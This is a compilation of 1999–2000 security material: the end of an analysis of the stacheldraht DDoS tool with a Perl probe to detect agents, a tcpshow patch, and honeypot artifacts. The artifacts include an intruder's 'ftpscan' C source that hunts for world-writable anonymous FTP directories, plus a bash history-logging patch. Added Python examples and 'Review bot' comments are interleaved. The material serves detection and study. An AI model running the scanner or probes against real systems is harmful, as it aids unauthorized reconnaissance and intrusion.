      ttymon  449 root    3u  sock    0,0           779 can't identify protocol
      ------------------------------------------------------------------------------
      
      
      Defenses
      --------
      
      Because the programs use ICMP_ECHOREPLY packets for communication,
      it will be very difficult (if not impossible) to block it without
      breaking most Internet programs that rely on ICMP.  The Phrack
      paper on LOKI states:
      
              The only sure way to destroy this channel is to deny ALL
              ICMP_ECHO traffic into your network.
      
      Short of rejecting this traffic, it will instead be necessary to observe
      the difference between "normal" use of ICMP_ECHO and ICMP_ECHOREPLY
      packets by programs like "ping".  This will not be an easy task,
      especially on large networks.  (See the LOKI paper for more details.)
      
      The real defense is to make sure that *all* systems are kept up to
      date with security patches, unnecessary services are turned off,
      and competent system administrators are running and monitoring
      every Unix system on your network.  (I'll hold my breath while you
      go make that happen, OK? ;)
      
      
      Weaknesses
      ----------
      
      If the source has not been modified, you can identify stacheldraht
      clients/handlers/agents by the embedded strings shown earlier.
      
      The .distro command uses the Berkeley "rcp" command for obtaining
      updated copies of the agent.  Monitoring "rcp" connections (514/tcp)
      from multiple systems on your network, in quick succession, to a
      single IP address outside your network would be a good trigger. (Note
      that the use of "rcp" in this form requires an anonymous trust
      relationship, usually in the form of "+ +" in a user's ~/.rhosts file,
      which also will allow you to immediately archive the contents of this
      account while contacting the owners to preserve evidence.)
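
      One way to implement the "rcp" trigger described above, as an added
      Python example that is not part of the original analysis: it flags an
      outside address that receives 514/tcp connections from several inside
      hosts within a short window.  The record format, the 300-second
      window, the three-host threshold and the flow data are assumptions
      constructed for illustration.

```python
import ipaddress
from collections import defaultdict, deque

RCP_PORT = 514  # Berkeley rcp (514/tcp), the transport used by ".distro"


def find_rcp_bursts(flows, internal_nets, window=300, min_sources=3):
    """Find outside hosts contacted on 514/tcp by many inside hosts at once.

    flows: iterable of (epoch_seconds, src_ip, dst_ip, dst_port), one per new
    TCP connection, in any order. window and min_sources are assumed tuning
    values, not figures from the analysis.
    Returns [(dst_ip, first_timestamp, sorted_sources), ...].
    """
    nets = [ipaddress.ip_network(n) for n in internal_nets]

    def internal(ip):
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in nets)

    recent = defaultdict(deque)  # dst -> (ts, src) pairs still inside window
    alerts = {}                  # dst -> (first_ts, set of sources)
    for ts, src, dst, port in sorted(flows):
        # Only inside -> outside rcp connections are of interest.
        if port != RCP_PORT or not internal(src) or internal(dst):
            continue
        queue = recent[dst]
        queue.append((ts, src))
        while queue and ts - queue[0][0] > window:
            queue.popleft()
        sources = {s for _, s in queue}
        # One host using rcp repeatedly is ordinary; many hosts at once is not.
        if len(sources) >= min_sources:
            if dst not in alerts:
                alerts[dst] = (queue[0][0], set())
            alerts[dst][1].update(sources)
    return [(dst, first, sorted(srcs))
            for dst, (first, srcs) in sorted(alerts.items())]


INTERNAL_NETS = ["192.168.0.0/16", "10.0.0.0/8"]

# Constructed connection records (documentation addresses for outside hosts).
FLOWS = [
    (1000, "192.168.0.1", "203.0.113.7", 514),    # three agents fetch an
    (1012, "192.168.2.10", "203.0.113.7", 514),   # update from one cache
    (1030, "192.168.1.5", "203.0.113.7", 514),    # within 30 seconds
    (1100, "192.168.0.30", "198.51.100.9", 514),  # one host, repeated use
    (1160, "192.168.0.30", "198.51.100.9", 514),
    (1220, "192.168.0.30", "198.51.100.9", 514),
    (2000, "192.168.3.6", "198.51.100.20", 514),  # two hosts, then a third
    (2050, "192.168.1.2", "198.51.100.20", 514),  # long after the window
    (9500, "192.168.0.1", "198.51.100.20", 514),
    (3000, "192.168.0.1", "10.0.0.1", 514),       # inside destination
    (3001, "192.168.1.2", "10.0.0.1", 514),
    (3002, "192.168.1.5", "10.0.0.1", 514),
    (3100, "192.168.0.1", "203.0.113.7", 80),     # not rcp
]

if __name__ == "__main__":
    for dst, first, srcs in find_rcp_bursts(FLOWS, INTERNAL_NETS):
        print(f"rcp burst to {dst} starting at {first}: {', '.join(srcs)}")
```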
      
      The IP spoof test uses a constant source address of "3.3.3.3".  Watch
      for this to show up in the source address of outgoing unsolicited
      ICMP_ECHOREPLY packets.  (If you do RFC 2267 style egress filtering,
      you will have to watch for these packets from somewhere inside your
      border routers, or on each subnet. Ethernet switches will make this
      more difficult to do on local subnets, so an intrusion detection
      system (IDS) just inside your borders would be the best way to do
      this for your entire network.)
      
      Since stacheldraht uses ICMP_ECHOREPLY packets for some of its
      functioning, and those TCP connections that it uses employ Blowfish
      encryption of the data stream, it will be difficult to detect
      stacheldraht in action, and the ICMP_ECHOREPLY packets will go right
      through most firewalls.  Programs like "ngrep" do not process ICMP
      packets, so you will not as easily (at this point in time) be able to
      watch for strings in the data portion of the ICMP packets (except
      using the patches to tcpshow from Appendix C and patches to
      sniffit provided in the analysis of TFN).
      
      Stacheldraht does not authenticate the source of ICMP packets,
      and also does not encrypt strings embedded in ICMP packets.
      
      If the command values have not been changed from the default,
      as few as just one packet would be necessary to flush out an
      agent.  Either:
      
        a). send an ICMP_ECHOREPLY packet with an ID field value of 668 and
            watch for an ICMP_ECHOREPLY packet to come back with an ID field
            value of 669 and the string "sicken\n" in the data field, or
      
        b). send an ICMP_ECHOREPLY packet with a source address of
            "3.3.3.3" (and ID value of 666 and data field with "skillz"
            if you want to go all out) and watch for an ICMP_ECHOREPLY
            packet to come back with an ID field value of 1000 and the
            string "spoofworks" in the data field.
      
      (A Perl script using Net::RawIP named "gag" has been developed to
      accomplish the former.  See Appendix A).
      
      
      The next logical evolutionary steps
      -----------------------------------
      
      When I first started analyzing trinoo source code back in early
      October, and after having observed TFN binaries in action just after
      that, it was obvious to me that encryption of communication channels
      and more automated maintenance of large networks was in active
      development.  Discussions with others at the CERT workshop in November
      brought out many other new feature ideas that I'm sure the underground
      is also thinking of.
      
      Having now seen the stacheldraht code, and that of yet another
      unreleased distributed denial of service attack tool (for a total of
      four different handler/agent distributed DoS tools found "in the
      wild" this year), the assumptions about the evolution of these tools
      appear to have been correct, even if the code remains a bit unfinished
      and with a few bugs (e.g., installations witnessed as late as December
      20 continue to include cron entries that re-start the agent every
      minute!)
      
      I can't wait to see what the New Year will bring. ;) :(  ??  @#$%^&*!!!
      
      --
      David Dittrich <dittrich@cac.washington.edu>
      http://staff.washington.edu/dittrich/
      
      
      
      Appendix A - Perl script "gag" to detect stacheldraht agents
      ------------------------------------------------------------
      
      -------------------------------  cut here  -----------------------------------
      #!/usr/bin/perl
      #
      # gag v. 1.0
      # By Dave Dittrich <dittrich@cac.washington.edu>
      #
      # Send an ICMP_ECHOREPLY packet with ID of 668 to a stacheldraht
      # agent, causing it to reply to the sending host with an
      # ICMP_ECHOREPLY packet with an ID of 669 and the string "sicken\n"
      # in the data field of the packet.  Watch for this with tcpdump,
      # sniffit, etc., e.g.:
      #
      #       # tcpdump -s 1500 -w stach.dump 'icmp[4:2] = 669'
      #       # tcpshow < stach.dump
      #
      # Needs Net::RawIP (http://quake.skif.net/RawIP)
      # Requires libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z)
      #
      # Example: ./gag [options] host1 [host2 [...]]
      #
      # (This code was hacked from the "macof" program, written by
      # Ian Vitek <ian.vitek@infosec.se>)
      
      require 'getopts.pl';
      use Net::RawIP;
      require 'netinet/in.ph';
      
      $a = new Net::RawIP({icmp => {}});
      chop($hostname = `hostname`);
      
      Getopts('a:c:f:i:vh');
      die "usage: $0 [options] iplist\
      \t-a arg\t\tSend command argument 'arg' (default \"gesundheit!\")\
      \t-c val\t\tSend command value 'val' (default 668 - ID_TEST)\
      \t-f from_host\t\t(default:$hostname)\
      \t-i interface \t\tSet sending interface (default:eth0)\
      \t-v\t\t\tVerbose\
      \t-h This help\n" unless ( !$opt_h );
      
      # set default values
      $opt_i = ($opt_i) ? $opt_i : "eth0";
      $opt_a = ($opt_a) ? $opt_a : "gesundheit!";
      $opt_c = ($opt_c) ? $opt_c : "668";
      
      # choose network card
      if($opt_e) {
        $a->ethnew($opt_i, dest => $opt_e);
      } else {
        $a->ethnew($opt_i);
      }
      
      # -f sets the source host; the original tested $opt_h (the help flag) here
      $s_host = ($opt_f) ? $opt_f : $hostname;
      
      if ($ARGV[0]) {
        open(I,"<$ARGV[0]") || die "could not open file: '$ARGV[0]'";
        while (<I>) {
          chop;
          push(@list,$_);
        }
        close(I);
      }
      
      # Put value in network byte order (couldn't get htons() in
      # "netinet/in.ph" to work. Go figure.)
      $id = unpack("S", pack("n", $opt_c));
      
      foreach $d_host (@list) {
        $a->set({ip => {saddr => $s_host, daddr => $d_host},
                 icmp => {type => 0, id => $id, data => $opt_a}
                });
        print "sending packet [$opt_c/\"$opt_a\"] to $d_host\n" if $opt_v;
        $a->send;
      }
      
      exit(0);
      -------------------------------  cut here  -----------------------------------
      
      
      Appendix B - References
      -----------------------
      
      TCP/IP Illustrated, Vol. I, II, and III. W. Richard Stevens and Gary
      R. Wright, Addison-Wesley.
      
      The DoS Project's "trinoo" distributed denial of service attack tool
              http://staff.washington.edu/dittrich/misc/trinoo.analysis
      
      The "Tribe Flood Network" distributed denial of service attack tool
              http://staff.washington.edu/dittrich/misc/tfn.analysis
      
      CERT Distributed System Intruder Tools Workshop report
              http://www.cert.org/reports/dsit_workshop.pdf
      
      CERT Advisory CA-99-17 Denial-of-Service Tools
              http://www.cert.org/advisories/CA-99-17-denial-of-service-tools.html
      
      Distributed denial of service attack tools at Packet Storm Security
              http://packetstorm.securify.com/distributed/
      
      tcpdump:
              ftp://ftp.ee.lbl.gov/tcpdump.tar.Z
      
      tcpshow:
              http://packetstorm.securify.com/linux/trinux/src/tcpshow.c
      
      sniffit:
              http://sniffit.rug.ac.be/sniffit/sniffit.html
      
      Net::RawIP:
              http://quake.skif.net/RawIP
      
      loki client/server:
              Phrack Magazine, Volume Seven, Issue Forty-Nine,
              File 06 of 16, [ Project Loki ]
              http://www.phrack.com/search.phtml?view&article=p49-6
      
              Phrack Magazine  Volume 7, Issue 51 September 01, 1997,
              article 06 of 17 [ L O K I 2   (the implementation) ]
              http://www.phrack.com/search.phtml?view&article=p51-6
      
      libnet:
              http://www.packetfactory.net/libnet
      ----------------------------------------------------------------------------
      
      
      Appendix C: Patches to tcpshow 1.0 to display ICMP ECHO id/seq
      ----------------------------------------------------------------------
      diff -c tcpshow/tcpshow.c tcpshow.orig/tcpshow.c
      *** tcpshow/tcpshow.c   Mon Dec 27 16:21:54 1999
      --- tcpshow.orig/tcpshow.c      Thu Oct 21 14:12:19 1999
      ***************
      *** 1081,1088 ****
           uint2 nskipped;
           uint1 type;
           char *why;
      -    uint2 echo_id;
      -    uint2 echo_seq;
      
      
           type = getbyte(&pkt);  nskipped  = sizeof(type);
      --- 1081,1086 ----
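      Review bot: the file header lists the patched tree first
      (*** tcpshow/tcpshow.c) and tcpshow.orig second, so the new declarations
      "uint2 echo_id;" and "uint2 echo_seq;" show up here as "-" lines and the
      empty "--- 1081,1086 ----" side is the unpatched file. Regenerate the
      diff with the original tree as the first argument, or state in the
      appendix heading that it must be applied with patch -R; as posted it
      will not apply to a stock tcpshow 1.0 tree.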
      ***************
      *** 1093,1103 ****
           /* Must calculate it from the size of the IP datagram - the IP header.   */
           datalen -= ICMPHDRLEN;
      
      -    if (type == ECHO_REQ || type == ECHO_REPLY) {
      -       echo_id = getword(&pkt); nskipped += sizeof(cksum);
      -       echo_seq = getword(&pkt); nskipped += sizeof(cksum);
      -    }
      -
           why = icmpcode(type, code);
           if (dataflag) {
              printf(
      --- 1091,1096 ----
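      Review bot: in the ECHO_REQ/ECHO_REPLY branch, nskipped is advanced by
      sizeof(cksum) for both echo_id and echo_seq, which is only right if
      cksum is also a uint2; use sizeof(echo_id) and sizeof(echo_seq). The two
      getword() calls also consume four more bytes after
      "datalen -= ICMPHDRLEN;" has already run, so unless ICMPHDRLEN already
      counts the id and sequence words, datalen is four bytes too large for
      echo packets and should be reduced inside this branch.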
      ***************
      *** 1120,1129 ****
               icmptype(type), why? "\n\tBecause:\t\t\t": "", why? why: ""
              );
              printf("\tChecksum:\t\t\t0x%04X\n", cksum);
      -       if (type == ECHO_REQ || type == ECHO_REPLY) {
      -          printf("\tId:\t\t\t\t0x%04X (%d)\n", echo_id, echo_id);
      -          printf("\tSequence:\t\t\t0x%04X (%d)\n", ntohs(echo_seq), ntohs(echo_seq));
      -       }
           }
      
           return pkt;
      --- 1113,1118 ----
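      Review bot: the two new printf lines handle byte order differently:
      echo_id is printed as returned by getword() while echo_seq goes through
      ntohs(). Both values come from the same getword() call in the previous
      hunk, so one of them is byte-swapped on a little-endian host. Pick one
      convention (whatever getword() returns) and apply it to both, since the
      Id value is what a reader compares against 666/668/669/1000 when looking
      for agent traffic.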
      ***************
      *** 1194,1200 ****
              printf("\tVersion:\t\t\t4\n\tHeader Length:\t\t\t%d bytes\n", hlen);
              printf("\tService Type:\t\t\t0x%02X\n", (uint2)servtype);
              printf("\tDatagram Length:\t\t%d bytes\n", dgramlen);
      !       printf("\tIdentification:\t\t\t0x%04X (%d)\n", id, id);
              printf(
               "\tFlags:\t\t\t\tMF=%s DF=%s\n",
               (flags & MF) == MF? on: off, (flags & DF) == DF? on_e: off_e
      --- 1183,1189 ----
              printf("\tVersion:\t\t\t4\n\tHeader Length:\t\t\t%d bytes\n", hlen);
              printf("\tService Type:\t\t\t0x%02X\n", (uint2)servtype);
              printf("\tDatagram Length:\t\t%d bytes\n", dgramlen);
      !       printf("\tIdentification:\t\t\t0x%04X\n", id);
              printf(
               "\tFlags:\t\t\t\tMF=%s DF=%s\n",
               (flags & MF) == MF? on: off, (flags & DF) == DF? on_e: off_e
      ----------------------------------------------------------------------
      
      --
      Dave Dittrich                 Client Services
      dittrich@cac.washington.edu   Computing & Communications
                                    University of Washington
      
      Dave Dittrich / dittrich@cac.washington.edu [PGP Key]
      http://www.washington.edu/People/dad/
      
      PGP 6.5.1 key fingerprint:
      FE 97 0C 57 08 43 F3 EB  49 A1 0C D0 8E 0C D0 BE  C8 38 CC B5
      
      EoF   
      
      Serverlog example Know your enemy #2
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      *.*                                                     @192.168.41.15
      
      # Log all kernel messages to the console.
      # Logging much else clutters up the screen.
      #kern.*                                                 /dev/console
      
      # Log anything (except mail) of level info or higher.
      #Don't log private authentication messages!
      *.info;mail.none;authpriv.none                          /var/log/messages
      
      # The authpriv file has restricted access.
      authpriv.*                                              /var/log/secure
      
      # Log all the mail messages in one place.
      mail.*                                                  /var/log/maillog
      
      # Log  all ssh1 traffic
      local1.info                                             /var/log/sshdlog
      
      # Everybody gets emergency messages, plus log them on another
      # machine.
      *.emerg                                                 *
      
      # Save mail and news errors of level err and higher in a
      # special file.
      uucp,news.crit                                          /var/log/spooler
      
      
      EoF
         
      
      ftp-scan.c Know your enemy #2
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      /* 
       * ftpscan 1.o - by vENOMOUS of rdC - Mar 29, 1999
       *
       * This will open a specific file [-f file], get the IPs from it,
       * then, check if FTP port [ -p 21 ] is open and log  the  version.
       * If you specify the [ -o ] flag  it will try log into the FTP
       * and execute LIST command [recursive], this is useful 
       * to see if there are any world writeable directories.
       *
       * You should know what you can do with that.
       *
       * credits: localip (lip) routine has been taken from queSO.
       *
       * Greets: ka0z [!thanks for the help, ideas and advices buddy!] - meengo
       *         #rdC - ub
       *
      */
      
      #include <stdio.h>
      #include <string.h>
      #include <netdb.h>
      #include <netinet/in.h>
      #include <sys/socket.h>
      #include <sys/types.h>
      #include <sys/time.h>
      #include <unistd.h>
      #include <errno.h>
      #include <time.h>
      #include <signal.h>
      #include "blah.h"    /* taken from queSO */
      
      char rdcopenfile(char g0d[257]);
      void usage(char *damn);
      void RDCconnect2(char host[1000], int puerto);
      int bindit(int socket_type, u_short port, int *listener); 
      void sigh(int z);
      u_long lip(void); /* QueSO */
      
      FILE *file;
      FILE *fileout;
      
      char ipsfile[256],
           bleh[100000][200],
           homer[256],
           beer[256],
           huhense[32];
      
      u_long localip; 
      
      int sockfd,
          leen2=0,
          listing=0,
          sockfd1,
          ip1=0, 
          ip2=0, 
          ip3=0, 
          ip4=0, 
          lsock=-1,
          port2=-1,
          lala=0,
          dfinder=0,
          gotit=0,
          xx=0;
       
      int main(int argc, char **argv)
      {
      char arg;
      
      int  p0rt=21;
      
              if ( argc < 3 ) 
              { 
              usage(argv[0]); 
              }
              
              while ((arg = getopt(argc, argv, "f:p:o")) != EOF)
              {
                      switch(arg)
                      {
                              case 'f':
                                 strncpy(ipsfile,optarg,128);
                                 break;
                              case 'p':
                                 p0rt = atoi (optarg);
                                 break;
                              case 'o':
                                 listing = 1;
                                 break;
                              default:
                                 usage(argv[0]);
                              break;
      
                      }
              }
              while (dfinder < 5)
                      {
                         char disp[500];
                              sprintf(disp,"ppp%d",dfinder);
                              strcpy(huhense,disp);
                              localip = lip();
                              sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
                              if ((ip3 && ip4) != 0)
                                      {
                                              gotit=1;
                                              break;
                                      }
                              dfinder++;
                      }
      
              dfinder=0;
              if (gotit == 1)
                      dfinder=6;
              while (dfinder < 5)
                      {
                         char disp[500];
                              sprintf(disp,"eth%d",dfinder);
                              strcpy(huhense,disp);
                              localip = lip();
                              sscanf((char *) inet_ntoa(localip),"%d.%d.%d.%d", &ip1, &ip2, &ip3,&ip4);
                              if ((ip3 && ip4) != 0)
                                      {
                                              gotit=1;
                                              break;
                                      }
                              dfinder++;
                      }
      
              if (gotit == 0)
              {
                      fprintf(stdout,"\nCannot define local ip address, aborting!\n\n");
                      fflush(stdout);
                      exit(1);
              }
      
              fprintf(stdout,"Local IP is %s\nStarting Scan...  \n\n",inet_ntoa(localip));
              fflush(stdout);
      
              sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n", ip1, ip2, ip3 ,ip4, 222 + lala);
              strlen(beer);
      
              rdcopenfile(ipsfile);
              for (xx = 0 ; xx < leen2 ; xx++)
                      {
                              RDCconnect2(bleh[xx], p0rt);
                              lala++;
                      }
      }
      
      char rdcopenfile(char g0d[257])
      {
      int x;
      
               /* see if the file can be read... */
              if ((file=fopen(g0d,"r")) == NULL) 
              {
                      printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n");
                      printf("\nCannot open file %s for reading\n\n", g0d);
                      exit(1);
              }
              /* get the all the lines */
              for ( ; fgets(bleh[leen2], 190, file) != NULL ; leen2++);
              fclose(file);
      }
      
      
      void RDCconnect2(char host[1000], int puerto)
      {
      char versi0n[5000];
      int nmb;
              struct sockaddr_in beb;
              struct hostent *d0h;
      //      struct timeval timev; 
              beb.sin_family = AF_INET;
              beb.sin_port = htons(puerto);
              d0h = gethostbyname(host);
              if (!d0h) 
              {
                      if ( (beb.sin_addr.s_addr = inet_addr(host)) == INADDR_NONE) 
                              {
                                      printf("\nftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99\n");
                                      printf("\nPut a correct address\n\n");
                                      exit(0);
                              }
              } else
                      {
                                 bcopy( d0h->h_addr, (struct in_addr *) &beb.sin_addr, d0h->h_length);
                      }
      
              strcpy(homer,"unable to connect: Connection refused");
              sockfd = socket(AF_INET, SOCK_STREAM,0);
              fprintf(stdout,"\n------------------------------------------------------------------------------n");
              fprintf(stdout,"IP: %s", host);
              fflush(stdout);
              signal(SIGALRM, sigh);
              alarm(10); 
              if(connect(sockfd, (struct sockaddr *)&beb, sizeof(struct sockaddr)) < 0)
                      {
                              fprintf(stdout,"%s\n\n",homer);
                              fflush(stdout);
                              return;
      
                      }
              alarm(0);
              bzero(versi0n, sizeof(versi0n));
              if ((nmb = recv(sockfd, versi0n, 5000, 0)) == -1)
                      {
                              fprintf(stdout,"Connection reset by peer?\n\n");
                              fflush(stdout);
                      } 
              if (strlen(versi0n) == 0)
                      {
                              close(sockfd);
                              return;
                      }
              if (strstr(versi0n,"Microsoft") != NULL)
                      {
                              fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n");
                              fflush(stdout);
                              close(sockfd);
                              return;
                      }
              if (strstr(versi0n,"WinSock") != NULL)
                      {
                              fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n");
                              fflush(stdout);
                              close(sockfd);
                              return;
                      }
              if (strstr(versi0n,"NetWare") != NULL)
                      {
                              fprintf(stdout,"Skipping host cuz its runing NetWare\n\n");
                              fflush(stdout);
                              close(sockfd);
                              return;
                      }
              if (strstr(versi0n,"Proxy Server") != NULL)
                      {
                              fprintf(stdout,"Runing ProxyServer, skipping host\n\n");
                              fflush(stdout);
                              close(sockfd);
                              return;
                      }
      
              fprintf(stdout,"FTP banner:\n");
              fprintf(stdout,"%s\n",versi0n); 
              fflush(stdout);
              if (listing == 1)
                      {
                         char username[70],
                              sendear[17200],
                              listit[100];
                              
                              int n;
      
                              /* login in */
                              strcpy(username,"anonymous");
                              sprintf(sendear,"USER %s\n",username);
                              fprintf(stdout,"Login as: %s\n",username);
                              write(sockfd,sendear,strlen(sendear));
                              read(sockfd,sendear,sizeof(sendear));
                              if (strstr(sendear,"denied") != NULL)
                              {
                                      fprintf(stdout,"Anonymous access denied, skipping\n\n");
                                      close(sockfd);
                                      return;
                              }
                              if (strstr(sendear,"USER anonymous") != NULL)
                              {
                                      fprintf(stdout,"Remote host has closed the connection.\n\n");
                                      close(sockfd);
                                      return;
                              }
                              if (strstr(sendear,"unknown") != NULL)
                              {
                                      fprintf(stdout,"Anonymous access unknown\n\n");
                                      close(sockfd);
                                      return;
                              }
                              if (strstr(sendear,"not found") != NULL)
                              {
                                      fprintf(stdout,"User anonymous not found\n\n");
                                      close(sockfd);
                                      return;
                              }
                              fprintf(stdout,"Answer: %s\n",sendear);
                              bzero(sendear, sizeof(sendear));
                              fprintf(stdout,"Using password: bleh@\n");
                              write(sockfd,"PASS bleh@\n",11);
                              read(sockfd,sendear,sizeof(sendear));
                              if (strstr(sendear,"Can't set") != NULL)
                              {
                                      fprintf(stdout,"Cant set guest privileges\n\n");
                                      close(sockfd);
                                      return;
                              }
                              fprintf(stdout,"Answer: %s\n",sendear);
                              bzero(sendear, sizeof(sendear));
                              fprintf(stdout,"Setting PORT to %d\n",17886+lala);
                              bzero(beer,sizeof(beer));
                              sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n",ip1, ip2, ip3 ,ip4, 222 + lala);
                              write(sockfd,beer,strlen(beer) + 4);
                              read(sockfd,beer,sizeof(beer)); 
                              /* bind the port for data transfer */
                              sockfd1 = bindit(SOCK_STREAM, port2, &lsock);
                              read(sockfd,sendear,sizeof(sendear)); 
                              fprintf(stdout,"Using LIST command\n");
                              fprintf(stdout,"Answer: %s\n",sendear); 
                              bzero(sendear, sizeof(sendear));  
                              read(sockfd1,sendear,sizeof(sendear));
                              fprintf(stdout,"Recursive list:\n %s\n",sendear);
                              bzero(sendear, sizeof(sendear));
                              fflush(stdout);
                      //      lala++;
                    } 
              close(sockfd);
              close(sockfd1);
      }
              
      int bindit(int socket_type, u_short port, int *listener)
      {
      struct sockaddr_in address;
      int listening_socket;
      int connected_socket = -1;
      int reuse_addr = 1;
      char sendear[17200];
      
              port = htons(17886+lala);
              memset((char *) &address, 0, sizeof(address));
              address.sin_family = AF_INET;
              address.sin_port = port;
              address.sin_addr.s_addr = htonl(INADDR_ANY);
      
              listening_socket = socket(AF_INET, socket_type, 0);
              if (listening_socket < 0) 
              {
                      fprintf(stdout,"Cant recive list.\n\n");
                      fflush(stdout);
                      return;
              }
      
              if (listener != NULL)
                      *listener = listening_socket;
      
              setsockopt(listening_socket, SOL_SOCKET, SO_REUSEADDR, &reuse_addr, sizeof(reuse_addr));
      
              if (bind(listening_socket, (struct sockaddr *) &address, sizeof(address)) < 0) 
              {
                      fprintf(stdout,"Error\n\n");
                      fflush(stdout);
                      close(listening_socket);
                      exit(1);
              }
              
              listen(listening_socket, 1);
              signal(SIGALRM, sigh);
              alarm(10);
              
              while(connected_socket < 0) 
              {
                      connected_socket = accept(listening_socket, NULL, NULL); 
              }
      }
      
      void sigh(int z)
      {
              alarm(0);
              signal(SIGALRM, SIG_DFL);
              strcpy(homer,"Unable to connect: timeout");
      }
      
      
      u_long lip (void)
      {
        int pvto,
            yesto,
            traversal;
        struct sockaddr_in *dim0n;
        struct ifreq *i;
        struct ifconf ic;
        char bufercito[512];
      
        pvto = socket (AF_INET, SOCK_STREAM, 0);
        ic.ifc_pum = 512;
        ic.ifc_buf = bufercito;
        ioctl (pvto, SIOCGIFCONF, (char *) &ic);
        i = ic.ifc_req;
        yesto = (ic.ifc_pum / sizeof(struct ifreq));
        for (traversal = 0; traversal < yesto; traversal++) {
      
            ioctl(pvto, SIOCGIFADDR, (char *) &i);
            dim0n = (struct sockaddr_in *) &i->ifr_ifru.ifru_addr;
            if (!strcmp (i->ifr_name, huhense))
            return dim0n->sin_addr.s_addr;
            i++;
            }
      }
      
      void usage(char *damn)
      {
      printf("\n<[(  ftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99 )]>");
      printf("<[(  usage:\n");
      printf("<[(        %s -f file [-p port] [-o]\n\n",damn);
      printf("<[( -f file: file is the IPs file.\n");
      printf("<[( -p port: port to connect to, default 21.\n");
      printf("<[(      -o: with this flag, ftpscan will log into the FTPserver\n");
      printf("<[(          as anonymous, and do a recursive list.\n\n");
      exit(0);
      }
      
      EoF
      
      Scripts from Know your enemy #2
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      From ant@notatla.demon.co.uk Tue May  2 13:26:38 2000
      Date: Sun, 23 Apr 2000 20:35:11 +0100
      From: Antonomasia <ant@notatla.demon.co.uk>
      To: lance@spitzner.net
      Subject: bash history logging
      
      Lance,
      
      In the bash-2.03 package of RH6.2 this mod will add history logging.
      It is done in the lib/readline/history.c file, concerned with recording
      commands rather than reading keystrokes, but the effect is almost the
      same.  One thing this doesn't record is when someone repeats the last
      command because that does not generate a new history record.
      
      Just 2 things need to be added: an include of the syslog.h file
      and a syslog(3) call with the new history entry.  I've split the
      syslog(3) section into 2 to cater for long and short lines separately
      because some syslog()s are/have been buggy.
      
           1  /* History.c -- standalone history library */
           2  
           3  /* Copyright (C) 1989, 1992 Free Software Foundation, Inc.
      
          32  #include <stdio.h>
      +   33  #include <syslog.h>
      
      
         217  /* Place STRING at the end of the history list.  The data field
         218     is  set to NULL. */
         219  void
         220  add_history (string)
         221       char *string;
         222  {
         223    HIST_ENTRY *temp;
         224  
      +  225    if (strlen(string)<60) {
      +  226        syslog(LOG_INFO, "BASH2 HISTORY: PID=%d %s", getpid(), string);
      +  227    } else {
      +  228        char trunc[60];
      +  229  
      +  230        strncpy(trunc,string,sizeof(trunc));
      +  231        trunc[sizeof(trunc)-1]='\0';
      +  232        syslog(LOG_INFO, "BASH2 HISTORY: PID=%d %s(++TRUNC)",
      +  233                          getpid(), trunc);
      +  234    }
         235  
         236    if (history_stifled && (history_length == max_input_history))
         237      {
         238        register int i;
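      Review bot: the else branch at lines 227-233 keeps only the first 59
      bytes of a long command and drops the rest, so anything typed past
      column 59 never reaches the log; loop over string and emit it in
      numbered 59-byte chunks instead of one truncated record. The record
      also carries only getpid(); adding getuid() would let the log reader
      attribute a command without correlating the PID against login records.
      The new calls rely on <string.h> and <unistd.h> already being included,
      which the listing does not show.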
      
      --
      ##############################################################
      # Antonomasia   ant@notatla.demon.co.uk                      #
      # See http://www.notatla.demon.co.uk/                        #
      ##############################################################
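
      Records written by the syslog(3) calls in the patch above can be
      regrouped into per-shell command histories on the log host. The Python
      below is an added example, not part of the e-mail or of bash; only the
      "BASH2 HISTORY: PID=%d %s" and "(++TRUNC)" formats come from the patch,
      while the syslog line prefix, host name and commands in the sample are
      constructed.

```python
import re
from collections import defaultdict

# Message format taken from the patch's syslog() calls; the leading
# "Mon DD HH:MM:SS host ident:" part is the usual syslogd prefix (assumed).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s(?P<host>\S+)\s\S+:\s"
    r"BASH2 HISTORY: PID=(?P<pid>\d+) (?P<cmd>.*)$"
)
TRUNC_MARK = "(++TRUNC)"
TRUNC_LEN = 59  # char trunc[60] minus the terminating NUL (ASCII assumed)


def parse_history(lines):
    """Group history records by (host, pid) -> [(timestamp, command, truncated)]."""
    sessions = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.rstrip("\n"))
        if m is None:
            continue  # not a history record
        cmd = m.group("cmd")
        # A genuine truncation is exactly 59 characters followed by the mark.
        # A short command that merely ends in "(++TRUNC)" was typed that way.
        body = cmd[: -len(TRUNC_MARK)] if cmd.endswith(TRUNC_MARK) else None
        truncated = body is not None and len(body) == TRUNC_LEN
        if truncated:
            cmd = body
        key = (m.group("host"), int(m.group("pid")))
        sessions[key].append((m.group("ts"), cmd, truncated))
    return dict(sessions)


def truncated_commands(sessions):
    """Return [(host, pid, timestamp, prefix)] for records that lost their tail."""
    return [
        (host, pid, ts, cmd)
        for (host, pid), entries in sorted(sessions.items())
        for ts, cmd, truncated in entries
        if truncated
    ]


# Constructed sample input.
_LONG = "tar cf - /etc /home /var/log | gzip -9 | uuencode backup.tgz | mail ops"
SAMPLE_LINES = [
    "Apr 23 20:35:11 rh62 bash: BASH2 HISTORY: PID=1201 id",
    "Apr 23 20:35:19 rh62 bash: BASH2 HISTORY: PID=1201 " + _LONG[:59] + TRUNC_MARK,
    "Apr 23 20:36:02 rh62 kernel: eth0: link up",
    "Apr 23 20:36:40 rh62 bash: BASH2 HISTORY: PID=1350 echo done(++TRUNC)",
]

if __name__ == "__main__":
    history = parse_history(SAMPLE_LINES)
    for (host, pid), entries in sorted(history.items()):
        print(f"{host} pid {pid}:")
        for ts, cmd, truncated in entries:
            print(f"  {ts}  {cmd}{'  [tail lost]' if truncated else ''}")
```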
      
